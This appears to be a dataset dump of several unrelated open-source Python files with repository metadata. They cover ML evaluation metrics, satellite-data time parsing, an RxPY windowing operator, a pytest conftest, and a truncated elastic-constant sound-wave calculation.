| 2019-03-24T13:05:00
|
Python
|
UTF-8
|
Python
| false
| false
| 22,141
|
py
|
evaluation.py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Cisco Systems, Inc. and others. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains base classes for models defined in the models subpackage."""
import logging
from collections import namedtuple
import numpy as np
from sklearn.metrics import accuracy_score, confusion_matrix, f1_score
from sklearn.metrics import precision_recall_fscore_support as score
from .helpers import (
ENTITIES_LABEL_TYPE,
entity_seqs_equal,
get_label_encoder,
)
from .taggers.taggers import (
BoundaryCounts,
get_boundary_counts,
)
logger = logging.getLogger(__name__)
class EvaluatedExample(
namedtuple(
"EvaluatedExample", ["example", "expected", "predicted", "probas", "label_type"]
)
):
"""Represents the evaluation of a single example
Attributes:
example: The example being evaluated
expected: The expected label for the example
predicted: The predicted label for the example
proba (dict): Maps labels to their predicted probabilities
label_type (str): One of CLASS_LABEL_TYPE or ENTITIES_LABEL_TYPE
"""
@property
def is_correct(self):
# For entities compare just the type, span and text for each entity.
if self.label_type == ENTITIES_LABEL_TYPE:
return entity_seqs_equal(self.expected, self.predicted)
# For other label_types compare the full objects
else:
return self.expected == self.predicted
class RawResults:
"""Represents the raw results of a set of evaluated examples. Useful for generating
stats and graphs.
Attributes:
predicted (list): A list of predictions. For sequences this is a list of lists, and for
standard classifieris this is a 1d array. All classes are in their numeric
representations for ease of use with evaluation libraries and graphing.
expected (list): Same as predicted but contains the true or gold values.
text_labels (list): A list of all the text label values, the index of the text label in
this array is the numeric label
predicted_flat (list): (Optional): For sequence models this is a flattened list of all
predicted tags (1d array)
expected_flat (list): (Optional): For sequence models this is a flattened list of all gold
tags
"""
def __init__(
self, predicted, expected, text_labels, predicted_flat=None, expected_flat=None
):
self.predicted = predicted
self.expected = expected
self.text_labels = text_labels
self.predicted_flat = predicted_flat
self.expected_flat = expected_flat
class ModelEvaluation(namedtuple("ModelEvaluation", ["config", "results"])):
"""Represents the evaluation of a model at a specific configuration
using a collection of examples and labels.
Attributes:
config (ModelConfig): The model config used during evaluation.
results (list of EvaluatedExample): A list of the evaluated examples.
"""
def __init__(self, config, results):
del results
self.label_encoder = get_label_encoder(config)
def get_accuracy(self):
"""The accuracy represents the share of examples whose predicted labels
exactly matched their expected labels.
Returns:
float: The accuracy of the model.
"""
num_examples = len(self.results)
num_correct = len([e for e in self.results if e.is_correct])
return float(num_correct) / float(num_examples)
def __repr__(self):
num_examples = len(self.results)
num_correct = len(list(self.correct_results()))
accuracy = self.get_accuracy()
msg = "<{} score: {:.2%}, {} of {} example{} correct>"
return msg.format(
self.__class__.__name__,
accuracy,
num_correct,
num_examples,
"" if num_examples == 1 else "s",
)
def correct_results(self):
"""
Returns:
iterable: Collection of the examples which were correct
"""
for result in self.results:
if result.is_correct:
yield result
def incorrect_results(self):
"""
Returns:
iterable: Collection of the examples which were incorrect
"""
for result in self.results:
if not result.is_correct:
yield result
def get_stats(self):
"""
Returns a structured stats object for evaluation.
Returns:
dict: Structured dict containing evaluation statistics. Contains precision, \
recall, f scores, support, etc.
"""
raise NotImplementedError
def print_stats(self):
"""
Prints a useful stats table for evaluation.
Returns:
dict: Structured dict containing evaluation statistics. Contains precision, \
recall, f scores, support, etc.
"""
raise NotImplementedError
def raw_results(self):
"""
Exposes raw vectors of expected and predicted for data scientists to use for any additional
evaluation metrics or to generate graphs of their choice.
Returns:
(tuple): tuple containing:
* NamedTuple: RawResults named tuple containing
                * expected: vector of gold classes (numeric values)
                * predicted: vector of predicted classes (numeric values)
                * text_labels: a list of all the text label values; the index of a
                  text label in this array is its numeric label
"""
raise NotImplementedError
@staticmethod
def _update_raw_result(label, text_labels, vec):
"""
Helper method for updating the text to numeric label vectors
Returns:
(tuple): tuple containing:
* text_labels: The updated text_labels array
* vec: The updated label vector with the given label appended
"""
if label not in text_labels:
text_labels.append(label)
vec.append(text_labels.index(label))
return text_labels, vec
def _get_common_stats(self, raw_expected, raw_predicted, text_labels):
"""
Prints a useful stats table and returns a structured stats object for evaluation.
Returns:
dict: Structured dict containing evaluation statistics. Contains precision, \
recall, f scores, support, etc.
"""
labels = range(len(text_labels))
confusion_stats = self._get_confusion_matrix_and_counts(
y_true=raw_expected, y_pred=raw_predicted
)
stats_overall = self._get_overall_stats(
y_true=raw_expected, y_pred=raw_predicted, labels=labels
)
counts_overall = confusion_stats["counts_overall"]
stats_overall["tp"] = counts_overall.tp
stats_overall["tn"] = counts_overall.tn
stats_overall["fp"] = counts_overall.fp
stats_overall["fn"] = counts_overall.fn
class_stats = self._get_class_stats(
y_true=raw_expected, y_pred=raw_predicted, labels=labels
)
counts_by_class = confusion_stats["counts_by_class"]
class_stats["tp"] = counts_by_class.tp
class_stats["tn"] = counts_by_class.tn
class_stats["fp"] = counts_by_class.fp
class_stats["fn"] = counts_by_class.fn
return {
"stats_overall": stats_overall,
"class_labels": text_labels,
"class_stats": class_stats,
"confusion_matrix": confusion_stats["confusion_matrix"],
}
@staticmethod
def _get_class_stats(y_true, y_pred, labels):
"""
Method for getting some basic statistics by class.
Returns:
dict: A structured dictionary containing precision, recall, f_beta, and support \
vectors (1 x number of classes)
"""
precision, recall, f_beta, support = score(
y_true=y_true, y_pred=y_pred, labels=labels
)
stats = {
"precision": precision,
"recall": recall,
"f_beta": f_beta,
"support": support,
}
return stats
@staticmethod
def _get_overall_stats(y_true, y_pred, labels):
"""
Method for getting some overall statistics.
Returns:
dict: A structured dictionary containing scalar values for f1 scores and overall \
accuracy.
"""
f1_weighted = f1_score(
y_true=y_true, y_pred=y_pred, labels=labels, average="weighted"
)
f1_macro = f1_score(
y_true=y_true, y_pred=y_pred, labels=labels, average="macro"
)
f1_micro = f1_score(
y_true=y_true, y_pred=y_pred, labels=labels, average="micro"
)
accuracy = accuracy_score(y_true=y_true, y_pred=y_pred)
stats_overall = {
"f1_weighted": f1_weighted,
"f1_macro": f1_macro,
"f1_micro": f1_micro,
"accuracy": accuracy,
}
return stats_overall
@staticmethod
def _get_confusion_matrix_and_counts(y_true, y_pred):
"""
        Generates the confusion matrix where each element Cij is the number of observations known to
        be in group i but predicted to be in group j
Returns:
dict: Contains 2d array of the confusion matrix, and an array of tp, tn, fp, fn values
"""
confusion_mat = confusion_matrix(y_true=y_true, y_pred=y_pred)
tp_arr, tn_arr, fp_arr, fn_arr = [], [], [], []
num_classes = len(confusion_mat)
for class_index in range(num_classes):
# tp is C_classindex, classindex
tp = confusion_mat[class_index][class_index]
tp_arr.append(tp)
# tn is the sum of Cij where i or j are not class_index
mask = np.ones((num_classes, num_classes))
mask[:, class_index] = 0
mask[class_index, :] = 0
tn = np.sum(mask * confusion_mat)
tn_arr.append(tn)
# fp is the sum of Cij where j is class_index but i is not
mask = np.zeros((num_classes, num_classes))
mask[:, class_index] = 1
mask[class_index, class_index] = 0
fp = np.sum(mask * confusion_mat)
fp_arr.append(fp)
# fn is the sum of Cij where i is class_index but j is not
mask = np.zeros((num_classes, num_classes))
mask[class_index, :] = 1
mask[class_index, class_index] = 0
fn = np.sum(mask * confusion_mat)
fn_arr.append(fn)
Counts = namedtuple("Counts", ["tp", "tn", "fp", "fn"])
return {
"confusion_matrix": confusion_mat,
"counts_by_class": Counts(tp_arr, tn_arr, fp_arr, fn_arr),
"counts_overall": Counts(
sum(tp_arr), sum(tn_arr), sum(fp_arr), sum(fn_arr)
),
}
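    # Worked example: for confusion_mat = [[5, 1], [2, 4]] the loop above yields
    # class 0: tp=5, tn=4, fp=2, fn=1 and class 1: tp=4, tn=5, fp=1, fn=2, so the
    # overall counts are tp=9, tn=9, fp=3, fn=3.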
def _print_class_stats_table(self, stats, text_labels, title="Statistics by class"):
"""
Helper for printing a human readable table for class statistics
Returns:
None
"""
title_format = "{:>20}" + "{:>12}" * (len(stats))
common_stats = [
"f_beta",
"precision",
"recall",
"support",
"tp",
"tn",
"fp",
"fn",
]
stat_row_format = (
"{:>20}"
+ "{:>12.3f}" * 3
+ "{:>12.0f}" * 5
+ "{:>12.3f}" * (len(stats) - len(common_stats))
)
table_titles = common_stats + [
stat for stat in stats.keys() if stat not in common_stats
]
print(title + ": \n")
print(title_format.format("class", *table_titles))
for label_index, label in enumerate(text_labels):
row = []
for stat in table_titles:
row.append(stats[stat][label_index])
print(stat_row_format.format(self._truncate_label(label, 18), *row))
print("\n\n")
def _print_class_matrix(self, matrix, text_labels):
"""
Helper for printing a human readable class by class table for displaying
a confusion matrix
Returns:
None
"""
# Doesn't print if there isn't enough space to display the full matrix.
if len(text_labels) > 10:
print(
"Not printing confusion matrix since it is too large. The full matrix is still"
" included in the dictionary returned from get_stats()."
)
return
labels = range(len(text_labels))
title_format = "{:>15}" * (len(labels) + 1)
stat_row_format = "{:>15}" * (len(labels) + 1)
table_titles = [
self._truncate_label(text_labels[label], 10) for label in labels
]
print("Confusion matrix: \n")
print(title_format.format("", *table_titles))
for label_index, label in enumerate(text_labels):
print(
stat_row_format.format(
self._truncate_label(label, 10), *matrix[label_index]
)
)
print("\n\n")
@staticmethod
def _print_overall_stats_table(stats_overall, title="Overall statistics"):
"""
Helper for printing a human readable table for overall statistics
Returns:
None
"""
title_format = "{:>12}" * (len(stats_overall))
common_stats = ["accuracy", "f1_weighted", "tp", "tn", "fp", "fn"]
stat_row_format = (
"{:>12.3f}" * 2
+ "{:>12.0f}" * 4
+ "{:>12.3f}" * (len(stats_overall) - len(common_stats))
)
table_titles = common_stats + [
stat for stat in stats_overall.keys() if stat not in common_stats
]
print(title + ": \n")
print(title_format.format(*table_titles))
row = []
for stat in table_titles:
row.append(stats_overall[stat])
print(stat_row_format.format(*row))
print("\n\n")
@staticmethod
def _truncate_label(label, max_len):
return (label[:max_len] + "..") if len(label) > max_len else label
class StandardModelEvaluation(ModelEvaluation):
def raw_results(self):
"""Returns the raw results of the model evaluation"""
text_labels = []
predicted, expected = [], []
for result in self.results:
text_labels, predicted = self._update_raw_result(
result.predicted, text_labels, predicted
)
text_labels, expected = self._update_raw_result(
result.expected, text_labels, expected
)
return RawResults(
predicted=predicted, expected=expected, text_labels=text_labels
)
def get_stats(self):
"""Prints model evaluation stats in a table to stdout"""
raw_results = self.raw_results()
stats = self._get_common_stats(
raw_results.expected, raw_results.predicted, raw_results.text_labels
)
# Note can add any stats specific to the standard model to any of the tables here
return stats
def print_stats(self):
"""Prints model evaluation stats to stdout"""
raw_results = self.raw_results()
stats = self.get_stats()
self._print_overall_stats_table(stats["stats_overall"])
self._print_class_stats_table(stats["class_stats"], raw_results.text_labels)
self._print_class_matrix(stats["confusion_matrix"], raw_results.text_labels)
class SequenceModelEvaluation(ModelEvaluation):
def __init__(self, config, results):
self._tag_scheme = config.model_settings.get("tag_scheme", "IOB").upper()
super().__init__(config, results)
def raw_results(self):
"""Returns the raw results of the model evaluation"""
text_labels = []
predicted, expected = [], []
predicted_flat, expected_flat = [], []
for result in self.results:
raw_predicted = self.label_encoder.encode(
[result.predicted], examples=[result.example]
)[0]
raw_expected = self.label_encoder.encode(
[result.expected], examples=[result.example]
)[0]
vec = []
for entity in raw_predicted:
text_labels, vec = self._update_raw_result(entity, text_labels, vec)
predicted.append(vec)
predicted_flat.extend(vec)
vec = []
for entity in raw_expected:
text_labels, vec = self._update_raw_result(entity, text_labels, vec)
expected.append(vec)
expected_flat.extend(vec)
return RawResults(
predicted=predicted,
expected=expected,
text_labels=text_labels,
predicted_flat=predicted_flat,
expected_flat=expected_flat,
)
def _get_sequence_stats(self):
"""
TODO: Generate additional sequence level stats
"""
sequence_accuracy = self.get_accuracy()
return {"sequence_accuracy": sequence_accuracy}
@staticmethod
def _print_sequence_stats_table(sequence_stats):
"""
Helper for printing a human readable table for sequence statistics
Returns:
None
"""
title_format = "{:>18}" * (len(sequence_stats))
table_titles = ["sequence_accuracy"]
stat_row_format = "{:>18.3f}" * (len(sequence_stats))
print("Sequence-level statistics: \n")
print(title_format.format(*table_titles))
row = []
for stat in table_titles:
row.append(sequence_stats[stat])
print(stat_row_format.format(*row))
print("\n\n")
def get_stats(self):
"""Prints model evaluation stats in a table to stdout"""
raw_results = self.raw_results()
stats = self._get_common_stats(
raw_results.expected_flat,
raw_results.predicted_flat,
raw_results.text_labels,
)
sequence_stats = self._get_sequence_stats()
stats["sequence_stats"] = sequence_stats
# Note: can add any stats specific to the sequence model to any of the tables here
return stats
def print_stats(self):
"""Prints model evaluation stats to stdout"""
raw_results = self.raw_results()
stats = self.get_stats()
self._print_overall_stats_table(
stats["stats_overall"], "Overall tag-level statistics"
)
self._print_class_stats_table(
stats["class_stats"],
raw_results.text_labels,
"Tag-level statistics by class",
)
self._print_class_matrix(stats["confusion_matrix"], raw_results.text_labels)
self._print_sequence_stats_table(stats["sequence_stats"])
class EntityModelEvaluation(SequenceModelEvaluation):
"""Generates some statistics specific to entity recognition"""
def _get_entity_boundary_stats(self):
"""
Calculate le, be, lbe, tp, tn, fp, fn as defined here:
https://nlpers.blogspot.com/2006/08/doing-named-entity-recognition-dont.html
"""
boundary_counts = BoundaryCounts()
raw_results = self.raw_results()
for expected_sequence, predicted_sequence in zip(
raw_results.expected, raw_results.predicted
):
expected_seq_labels = [
raw_results.text_labels[i] for i in expected_sequence
]
predicted_seq_labels = [
raw_results.text_labels[i] for i in predicted_sequence
]
boundary_counts = get_boundary_counts(
expected_seq_labels, predicted_seq_labels, boundary_counts
)
return boundary_counts.to_dict()
@staticmethod
def _print_boundary_stats(boundary_counts):
title_format = "{:>12}" * (len(boundary_counts))
table_titles = boundary_counts.keys()
stat_row_format = "{:>12}" * (len(boundary_counts))
print("Segment-level statistics: \n")
print(title_format.format(*table_titles))
row = []
for stat in table_titles:
row.append(boundary_counts[stat])
print(stat_row_format.format(*row))
print("\n\n")
def get_stats(self):
stats = super().get_stats()
if self._tag_scheme == "IOB":
boundary_stats = self._get_entity_boundary_stats()
stats["boundary_stats"] = boundary_stats
return stats
def print_stats(self):
raw_results = self.raw_results()
stats = self.get_stats()
self._print_overall_stats_table(
stats["stats_overall"], "Overall tag-level statistics"
)
self._print_class_stats_table(
stats["class_stats"],
raw_results.text_labels,
"Tag-level statistics by class",
)
self._print_class_matrix(stats["confusion_matrix"], raw_results.text_labels)
if self._tag_scheme == "IOB":
self._print_boundary_stats(stats["boundary_stats"])
self._print_sequence_stats_table(stats["sequence_stats"])
|
6094ea0e3cea0f774db6b6e4aa61db82f5f44711
|
bade10db04689048ad1837ced0a6d19e3cc81bf8
|
/sentinelhub/time_utils.py
|
235c2102d03da33f29a98cd069c18483b69541e3
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
sentinel-hub/sentinelhub-py
|
a91dc13f0306b121d4c2bca50557938c93d203bd
|
98d0327e3929999ec07645f77b16fceb7f9c88b9
|
refs/heads/master
| 2023-09-02T17:19:09.717530
| 2023-05-08T07:35:21
| 2023-05-08T07:35:21
| 91,571,506
| 704
| 239
|
MIT
| 2023-08-22T13:29:48
| 2017-05-17T12:00:34
|
Python
|
UTF-8
|
Python
| false
| false
| 8,096
|
py
|
time_utils.py
|
"""
Module with useful time/date functions
"""
import datetime as dt
from typing import Any, Iterable, List, Literal, Optional, Tuple, TypeVar, Union, overload
import dateutil.parser
import dateutil.tz
from .types import RawTimeIntervalType, RawTimeType
TimeType = TypeVar("TimeType", dt.date, dt.datetime) # pylint: disable=invalid-name
def is_valid_time(time: str) -> bool:
"""Check if input string represents a valid time/date stamp
:param time: A string containing a time/date.
    :return: `True` if the string is a valid time/date, `False` otherwise.
"""
try:
dateutil.parser.parse(time)
return True
except dateutil.parser.ParserError:
return False
@overload
def parse_time(
time_input: RawTimeType,
*,
force_datetime: Literal[False] = False,
allow_undefined: Literal[False] = False,
**kwargs: Any,
) -> dt.date:
...
@overload
def parse_time(
time_input: RawTimeType, *, force_datetime: Literal[True], allow_undefined: Literal[False] = False, **kwargs: Any
) -> dt.datetime:
...
@overload
def parse_time(
time_input: RawTimeType, *, force_datetime: Literal[False] = False, allow_undefined: bool = False, **kwargs: Any
) -> Optional[dt.date]:
...
@overload
def parse_time(
time_input: RawTimeType, *, force_datetime: Literal[True], allow_undefined: bool = False, **kwargs: Any
) -> Optional[dt.datetime]:
...
def parse_time(
time_input: RawTimeType, *, force_datetime: bool = False, allow_undefined: bool = False, **kwargs: Any
) -> Optional[dt.date]:
"""Parse input time/date string
:param time_input: An input representation of a time.
    :param force_datetime: If True it will always return a `datetime.datetime` object, if False it can also return a
        `datetime.date` object when only a date is provided as input.
:param allow_undefined: Flag to allow parsing None or '..' into None.
:param kwargs: Keyword arguments to be passed to `dateutil.parser.parse`. Example: `ignoretz=True`.
:return: A parsed datetime representing the time.
"""
if time_input is None or time_input == "..":
if allow_undefined:
return None
raise ValueError("Input is undefined but `allow_undefined` is set to `False`.")
if isinstance(time_input, dt.date):
if force_datetime and not isinstance(time_input, dt.datetime):
return date_to_datetime(time_input)
if kwargs.get("ignoretz") and isinstance(time_input, dt.datetime):
return time_input.replace(tzinfo=None)
return time_input
time = dateutil.parser.parse(time_input, **kwargs)
if force_datetime or len(time_input) > 10: # This check is not very accurate, but it works for ISO format
return time
return time.date()
def parse_time_interval(
time: Union[RawTimeType, RawTimeIntervalType], allow_undefined: bool = False, **kwargs: Any
) -> Tuple[Optional[dt.datetime], Optional[dt.datetime]]:
"""Parse input into an interval of two times, specifying start and end time, into datetime objects.
The input time can have the following formats, which will be parsed as:
    * `YYYY-MM-DD` -> `[YYYY-MM-DDT00:00:00, YYYY-MM-DDT23:59:59]`
* `YYYY-MM-DDThh:mm:ss` -> `[YYYY-MM-DDThh:mm:ss, YYYY-MM-DDThh:mm:ss]`
* list or tuple of two dates in form `YYYY-MM-DD` -> `[YYYY-MM-DDT00:00:00, YYYY-MM-DDT23:59:59]`
* list or tuple of two dates in form `YYYY-MM-DDThh:mm:ss` -> `[YYYY-MM-DDThh:mm:ss, YYYY-MM-DDThh:mm:ss]`
    All input times can also be specified as `datetime` objects. Instances of `datetime.date` will be treated as
    `YYYY-MM-DD` and instances of `datetime.datetime` will be treated as `YYYY-MM-DDThh:mm:ss`.
:param time: An input representation of a time interval.
    :param allow_undefined: Boolean flag that controls whether None or '..' are allowed.
:param kwargs: Keyword arguments to be passed to `parse_time` function.
:return: A pair of datetime objects defining the time interval.
:raises: ValueError
"""
date_interval: Tuple[Optional[dt.date], Optional[dt.date]]
if allow_undefined and time in [None, ".."]:
date_interval = None, None
elif isinstance(time, (str, dt.date)):
parsed_time = parse_time(time, **kwargs)
date_interval = parsed_time, parsed_time
elif isinstance(time, (tuple, list)) and len(time) == 2:
start_date = parse_time(time[0], allow_undefined=allow_undefined, **kwargs)
end_date = parse_time(time[1], allow_undefined=allow_undefined, **kwargs)
date_interval = start_date, end_date
else:
raise ValueError("Time must be a string/datetime object or tuple/list of 2 strings/datetime objects")
start_time, end_time = date_interval
if not isinstance(start_time, dt.datetime) and start_time is not None:
start_time = date_to_datetime(start_time)
if not isinstance(end_time, dt.datetime) and end_time is not None:
end_time = date_to_datetime(end_time, dt.time(hour=23, minute=59, second=59))
if start_time and end_time and start_time > end_time:
raise ValueError("Start of time interval is larger than end of time interval")
return start_time, end_time
@overload
def serialize_time(timestamp_input: Optional[dt.date], *, use_tz: bool = False) -> str:
...
@overload
def serialize_time(timestamp_input: Iterable[Optional[dt.date]], *, use_tz: bool = False) -> Tuple[str, ...]:
...
def serialize_time(
timestamp_input: Union[None, dt.date, Iterable[Optional[dt.date]]], *, use_tz: bool = False
) -> Union[str, Tuple[str, ...]]:
"""Transforms datetime objects into ISO 8601 strings.
:param timestamp_input: A datetime object or a tuple of datetime objects.
:param use_tz: If `True` it will ensure that the serialized string contains a timezone information (typically
with `Z` at the end instead of +00:00). If `False` it will make sure to remove any timezone information.
:return: Timestamp(s) serialized into string(s).
"""
if isinstance(timestamp_input, Iterable):
return tuple(serialize_time(timestamp, use_tz=use_tz) for timestamp in timestamp_input)
if timestamp_input is None:
return ".."
if not isinstance(timestamp_input, dt.date):
raise ValueError("Expected a datetime object or a tuple of datetime objects")
if use_tz:
if not isinstance(timestamp_input, dt.datetime):
raise ValueError(
"Cannot ensure timezone information for datetime.date objects, use datetime.datetime instead"
)
if not timestamp_input.tzinfo:
timestamp_input = timestamp_input.replace(tzinfo=dateutil.tz.tzutc())
elif isinstance(timestamp_input, dt.datetime) and timestamp_input.tzinfo:
timestamp_input = timestamp_input.replace(tzinfo=None)
return timestamp_input.isoformat().replace("+00:00", "Z")
def date_to_datetime(date: dt.date, time: Optional[dt.time] = None) -> dt.datetime:
"""Converts a date object into datetime object.
:param date: A date object.
    :param time: An optional time object; if not provided, `00:00:00` is used.
:return: A datetime object derived from date and time.
"""
if time is None:
time = dt.datetime.min.time()
return dt.datetime.combine(date, time)
def filter_times(timestamps: Iterable[TimeType], time_difference: dt.timedelta) -> List[TimeType]:
"""Filters out timestamps within time_difference, preserving only the oldest timestamp.
:param timestamps: A list of timestamps.
:param time_difference: A time difference threshold.
:return: An ordered list of timestamps `d_1 <= d_2 <= ... <= d_n` such that `d_(i+1)-d_i > time_difference`.
"""
timestamps = sorted(set(timestamps))
filtered_timestamps: List[TimeType] = []
for current_timestamp in timestamps:
if not filtered_timestamps or current_timestamp - filtered_timestamps[-1] > time_difference:
filtered_timestamps.append(current_timestamp)
return filtered_timestamps
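# Hedged usage sketch of the helpers above:
#
#     parse_time("2020-01-01")                       # -> datetime.date(2020, 1, 1)
#     parse_time("2020-01-01", force_datetime=True)  # -> datetime.datetime(2020, 1, 1, 0, 0)
#     parse_time_interval("2020-01-01")
#     # -> (datetime.datetime(2020, 1, 1, 0, 0), datetime.datetime(2020, 1, 1, 23, 59, 59))
#     serialize_time(dt.datetime(2020, 1, 1, tzinfo=dateutil.tz.tzutc()), use_tz=True)
#     # -> "2020-01-01T00:00:00Z"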
|
2f7e8a8040d1edb3717e91900732a66c55affc53
|
1e528494a929deada984822438b3ab569762e6c6
|
/rx/linq/observable/windowwithtime.py
|
b11edddc06daafb482af220b9ca9e56b69176bda
|
[
"MIT"
] |
permissive
|
Sprytile/Sprytile
|
a0233a00a243f263691921d7e1f6af05c5eb5442
|
6b68d0069aef5bfed6ab40d1d5a94a3382b41619
|
refs/heads/master
| 2022-07-10T06:54:01.003723
| 2020-09-26T07:25:35
| 2020-09-26T07:25:35
| 72,276,917
| 860
| 91
|
MIT
| 2022-07-07T23:37:19
| 2016-10-29T09:47:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,809
|
py
|
windowwithtime.py
|
from datetime import timedelta
from rx import AnonymousObservable, Observable
from rx.concurrency import timeout_scheduler
from rx.internal.utils import add_ref
from rx.disposables import SingleAssignmentDisposable, CompositeDisposable, \
RefCountDisposable, SerialDisposable
from rx.subjects import Subject
from rx.internal import extensionmethod
@extensionmethod(Observable)
def window_with_time(self, timespan, timeshift=None, scheduler=None):
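    """Projects each element of the source sequence into zero or more windows
    produced based on timing information. A hedged summary of the code below:

    timespan -- Length of each window, in milliseconds or as a timedelta.
    timeshift -- Interval between the openings of consecutive windows;
        defaults to timespan, which yields non-overlapping windows.
    scheduler -- Scheduler to run the windowing timers on; defaults to
        timeout_scheduler.

    Returns an observable sequence of windows (each itself an observable).
    """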
source = self
if timeshift is None:
timeshift = timespan
if not isinstance(timespan, timedelta):
timespan = timedelta(milliseconds=timespan)
if not isinstance(timeshift, timedelta):
timeshift = timedelta(milliseconds=timeshift)
scheduler = scheduler or timeout_scheduler
def subscribe(observer):
timer_d = SerialDisposable()
next_shift = [timeshift]
next_span = [timespan]
total_time = [timedelta(0)]
q = []
group_disposable = CompositeDisposable(timer_d)
ref_count_disposable = RefCountDisposable(group_disposable)
def create_timer():
m = SingleAssignmentDisposable()
timer_d.disposable = m
is_span = False
is_shift = False
if next_span[0] == next_shift[0]:
is_span = True
is_shift = True
elif next_span[0] < next_shift[0]:
is_span = True
else:
is_shift = True
new_total_time = next_span[0] if is_span else next_shift[0]
ts = new_total_time - total_time[0]
total_time[0] = new_total_time
if is_span:
next_span[0] += timeshift
if is_shift:
next_shift[0] += timeshift
def action(scheduler, state=None):
s = None
if is_shift:
s = Subject()
q.append(s)
observer.on_next(add_ref(s, ref_count_disposable))
if is_span:
s = q.pop(0)
s.on_completed()
create_timer()
m.disposable = scheduler.schedule_relative(ts, action)
q.append(Subject())
observer.on_next(add_ref(q[0], ref_count_disposable))
create_timer()
def on_next(x):
for s in q:
s.on_next(x)
def on_error(e):
for s in q:
s.on_error(e)
observer.on_error(e)
def on_completed():
for s in q:
s.on_completed()
observer.on_completed()
group_disposable.add(source.subscribe(on_next, on_error, on_completed))
return ref_count_disposable
return AnonymousObservable(subscribe)
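# Hedged usage sketch (assumes the classic RxPY 1.x API this module extends):
#
#     from rx import Observable
#
#     Observable.interval(100).window_with_time(500).subscribe(
#         lambda window: window.count().subscribe(
#             lambda n: print("items in this 500ms window:", n)))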
|
0b6bf31b546492560acfcb2425f6aa3de878ff51
|
e45cf6221f170e3077770dbf19a1ad3dd244cd10
|
/tests/conftest.py
|
84cb475f396701553e6bc46ac82ab1a113a99f6d
|
[
"Apache-2.0"
] |
permissive
|
anchore/anchore-cli
|
7b12bc80b428ed6d52717ceeaf5182953e4bbc53
|
f511644cf701646f002af6b392421304da508c86
|
refs/heads/master
| 2023-05-24T20:27:58.866558
| 2022-06-22T16:09:29
| 2022-06-22T16:09:29
| 102,535,562
| 119
| 64
|
Apache-2.0
| 2023-05-23T02:03:47
| 2017-09-05T22:27:17
|
Python
|
UTF-8
|
Python
| false
| false
| 920
|
py
|
conftest.py
|
import json
import pytest
class Factory(object):
def __init__(self, **kw):
for k, v in kw.items():
setattr(self, k, v)
@pytest.fixture
def stub_response():
def apply(status_code=200, text="", json_text=None):
if json_text is not None:
text = json.dumps(json_text)
response = Factory(status_code=status_code, text=text)
return response
return apply
@pytest.fixture(autouse=True)
def no_fds_closing(monkeypatch):
"""
    The ClickRunner test helper breaks when stdout and stderr are closed, as it is trying to capture
    whatever the tool was sending as output. This env var prevents anchore-cli from closing them,
    allowing the ClickRunner to work.
Related issues:
* https://github.com/pallets/click/issues/824
* https://github.com/pytest-dev/pytest/issues/3344
"""
monkeypatch.setenv("ANCHORE_CLI_NO_FDS_CLEANUP", "1")
|
89c3bf631ec45521b34551aefc3e687b45cf2f6c
|
9d0228f3f7ee9cee0794319d4affc161b0a7adc2
|
/qmpy/analysis/debye/sound_waves.py
|
d24a1badd3459beb67f37772c044fd30e2e9d7b0
|
[
"MIT"
] |
permissive
|
wolverton-research-group/qmpy
|
db8a450a5708aac63aa39e104745b5cb0a4fa930
|
dede5bdf4aa3ea1187a7bc273e86336c24aadb25
|
refs/heads/master
| 2023-01-24T17:18:48.335699
| 2022-08-23T01:12:29
| 2022-08-23T01:12:29
| 18,248,720
| 124
| 65
|
MIT
| 2023-01-11T02:04:51
| 2014-03-29T19:18:53
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 4,652
|
py
|
sound_waves.py
|
#!/usr/bin/python
# sound_waves.py v1.1 12-3-2011 Jeff Doak jeff.w.doak@gmail.com
import sys
import scipy as sp
from scipy import linalg
from scipy.integrate import dblquad
import read_file
BOLTZCONST = 1.381e-23 # J/K
PLANCKCONST = 6.626e-34 # J*s
AVONUM = 6.022e23 # things/mol
def dir_cosines(dir, coords=sp.identity(3)):
"""Returns a vector containing the direction cosines between vector dir, and
the coordinate system coords. Default coordinate system is an orthonormal
cartesian coordinate system."""
cosines = sp.dot(coords, dir) / linalg.norm(dir)
return cosines
def make_gamma(dc, C):
"""
Returns a matrix containing the modified set of elastic constants, C,
transformed by the direction cosines, dc.
"""
Gamma = sp.zeros((3, 3))
Gamma[0, 0] = dc[0] ** 2 * C[0, 0] + dc[1] ** 2 * C[5, 5] + dc[2] ** 2 * C[4, 4]
Gamma[0, 0] += 2 * dc[1] * dc[2] * C[4, 5] + 2 * dc[2] * dc[0] * C[0, 4]
Gamma[0, 0] += 2 * dc[0] * dc[1] * C[0, 5]
Gamma[1, 1] = dc[0] ** 2 * C[5, 5] + dc[1] ** 2 * C[1, 1] + dc[2] ** 2 * C[3, 3]
Gamma[1, 1] += 2 * dc[1] * dc[2] * C[1, 3] + 2 * dc[2] * dc[0] * C[3, 5]
Gamma[1, 1] += 2 * dc[0] * dc[1] * C[1, 5]
Gamma[2, 2] = dc[0] ** 2 * C[4, 4] + dc[1] ** 2 * C[3, 3] + dc[2] ** 2 * C[2, 2]
Gamma[2, 2] += 2 * dc[1] * dc[2] * C[2, 3] + 2 * dc[2] * dc[0] * C[2, 4]
Gamma[2, 2] += 2 * dc[0] * dc[1] * C[3, 4]
Gamma[0, 1] = dc[0] ** 2 * C[0, 5] + dc[1] ** 2 * C[1, 5] + dc[2] ** 2 * C[3, 4]
Gamma[0, 1] += dc[1] * dc[2] * (C[3, 5] + C[1, 4]) + dc[2] * dc[0] * (
C[0, 3] + C[4, 5]
)
Gamma[0, 1] += dc[0] * dc[1] * (C[0, 1] + C[5, 5])
Gamma[0, 2] = dc[0] ** 2 * C[0, 4] + dc[1] ** 2 * C[3, 5] + dc[2] ** 2 * C[2, 4]
Gamma[0, 2] += dc[1] * dc[2] * (C[3, 4] + C[2, 5]) + dc[2] * dc[0] * (
C[0, 2] + C[4, 4]
)
Gamma[0, 2] += dc[0] * dc[1] * (C[0, 3] + C[4, 5])
